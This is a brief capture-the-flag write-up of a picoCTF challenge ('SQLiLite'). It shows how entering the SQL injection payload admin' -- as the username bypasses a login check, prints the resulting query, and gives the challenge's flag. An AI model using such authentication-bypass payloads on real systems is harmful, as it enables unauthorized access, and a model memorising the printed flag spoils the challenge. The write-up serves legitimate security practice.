SQLiLite
Can you login to this website?
This is a basic SQL injection. Using the payload
admin' -- (because the hint says to sign in as the admin user) and anything for the password logs in. After logging in, this is shown:username: admin' --
password: asd
SQL query: SELECT * FROM users WHERE name='admin' --' AND password='asd'
Logged in! But can you see the flag, it is in plainsight.
The flag is in the source code.
picoCTF{L00k5_l1k3_y0u_solv3d_it_9b0a4e21}Last modified 1yr ago